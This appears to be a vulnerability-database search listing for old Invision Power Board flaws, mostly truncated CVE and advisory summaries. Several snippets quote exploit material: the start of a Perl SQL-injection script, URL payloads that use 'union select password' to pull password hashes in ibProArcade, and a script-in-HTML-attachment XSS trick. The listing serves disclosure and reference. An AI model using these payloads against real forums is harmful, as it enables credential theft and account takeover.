124 matches found
CVE-2006-0750
SQL injection vulnerability in army.php in supersmashbrothers SSB Army System 2.1.0 for Invision Power Board IPB allows remote attackers to execute arbitrary SQL commands via the userstat parameter in an army action to index.php...
Authentication flaw
The makepassword function in ipsclass.php in Invision Power Board IPB 2.1.4 uses random data generated from partially predictable seeds to create the authentication code that is sent by e-mail to a user with a lost password, which might make it easier for remote attackers to guess the code and...
CVE-2006-0633
The CVE concerns Invision Power Board (IPB) 2.1.4, where the make_password function in ipsclass.php generates the authentication code sent to users with lost passwords from random data derived from partially predictable seeds. This may allow remote attackers to guess the code and change an IPB ac...
Vulnerabilities in vBulltin(3.0.7 - 3.5.3) and IPB(2.0.0 - 2.1.4).
Hi everyone! the January 23 me was done work on revealing the criticality in forum vBulltin3.0.7 - 3.5.3 and IPB2.0.0 - 2.1.4. ------------------------------------------------------------------------- The Criticality were find nearly similar nature. Later I have tested them on rest version and th...
CVE-2006-0520
The CVE-2006-0520 entry concerns Invision Power Board’s Dragoran Portal module (IPB) version around 1.3. The vulnerability is an SQL injection in index.php via the site parameter, caused by inadequate sanitization before using the input in database queries. This allows remote attackers to inject ...
[SA18664] IPB Dragoran Portal Module "site" SQL Injection Vulnerability
TITLE: IPB Dragoran Portal Module "site" SQL Injection Vulnerability SECUNIA ADVISORY ID: SA18664 VERIFY ADVISORY: http://secunia.com/advisories/18664/ CRITICAL: Moderately critical IMPACT: Manipulation of data WHERE: From remote SOFTWARE: Dragoran Portal 1.x module for IPB...
Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit
No description provided by source. !/usr/bin/perl IPB Portal 1.3-Invision Power Board plugin Created By SkOd SED security Team , http://sed-team.be google: "Portal 1.3 by Dragoran" use IO::Socket; if @ARGV 3 print q IPB Portal 1.3 SQL injection Get Hash Exploit Tested on Invision Power Board 1.3....
Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection
!/usr/bin/perl IPB Portal 1.3-Invision Power Board plugin Created By SkOd SED security Team , http://sed-team.be google: "Portal 1.3 by Dragoran" use IO::Socket; if @ARGV new Proto = "tcp", PeerAddr = "$serv", PeerPort = "80" || die "-Connect Failed\r\n"; print "+Connecting...\n"; print $socket...
Invision Power Board Dragoran Portal Mod <= 1.3 SQL Injection Exploit
Exploit for unknown platform in category web applications ===================================================================== Invision Power Board Dragoran Portal Mod Invision Power Board plugin Created By SkOd SED security Team , http://sed-team.be google: "Portal 1.3 by Dragoran" use...
ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit
No description provided by source. Rankings for name will state the md5 hash for the user /str0ke ibProArcade 2.x IPB: index.php?act=Arcade&module=report&user=-1 union select password from ibfmembers where id=anyuser vBulettin forums: index.php?act=ibProArcade&module=report&user=-1 union select...
ibProArcade 2.x - module 'vBulletin/IPB' SQL Injection
Rankings for name will state the md5 hash for the user /str0ke ibProArcade 2.x IPB: index.php?act=Arcade&module=report&user=-1 union select password from ibfmembers where id=anyuser vBulettin forums: index.php?act=ibProArcade&module=report&user=-1 union select password from user where...
ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit
Exploit for unknown platform in category web applications =================================================================== ibProArcade 2.x module vBulletin/IPB Remote SQL Injection Exploit =================================================================== Rankings for name will state the md5...
CVE-2005-2542
Technical details about CVE-2005-2542 are not publicly available in the provided connected documents. Monitor for updates; sources do not specify affected versions, impact, vectors, or remediation beyond the IPB 1.0.3 issue.
CVE-2005-2542
Invision Power Board IPB 1.0.3 allows remote attackers to inject arbitrary web script or HTML via an attachment, which is automatically downloaded and processed as HTML...
E107 + IPB XSS Exploit
E107 + IPB XSS Exploit memo Works on e107 and IPB "maybe others like xoops not yet tested" An XSS vulnerability allowed users to inject code When posting a html attachment tested succesfully on ipb 1.0.3 all the vers should be vuln tested on e107 6. Patch none yet, workround. disalow .html as...
ipb Css bug(now public)
the css found when you uploading a file to the server by the "atteched file" function.. in ipb you can upload some HTML file,in the html file write this: html body scriptalert'Css found By ViRuS';/script /body /html when someone will click on the attechment file the script will run. sry about my...
CVE-2005-1816
Invision Power Board (IPB) versions 1.0–2.0.4 are affected by a privilege-escalation vulnerability where non-root admins can add themselves or other users to the root admin group via the “Move users in this group to” screen. This has been reported consistently across CVE-2005-1816 records (NVD, R...
CVE-2005-1817
Invision Power Board (IPB) versions 1.0–1.3 are affected by a vulnerability in index.php that allows remote attackers to edit arbitrary forum posts by sending a modified request. The issue is triggered via direct parameter manipulation in a HTTP request to index.php, enabling an attacker to alter...
CVE-2005-1597
CVE-2005-1597 affects Invision Power Board (IPB) versions 2.0.3 and earlier. The vulnerability is a Cross-Site Scripting (XSS) flaw in the search.php and topics.php scripts, caused by unsanitized input in the highlite parameter, which allows arbitrary script/HTML injection. Public sources (IPB ex...
CVE-2005-1598
CVE-2005-1598 corresponds to a SQL Injection in Invision Power Board (IPB) <= 2.0.3. The vulnerability allows remote attackers to execute arbitrary SQL via a crafted pass_hash cookie that alters the internal $pid variable. Impact is partial confidentiality and integrity; variants include addit...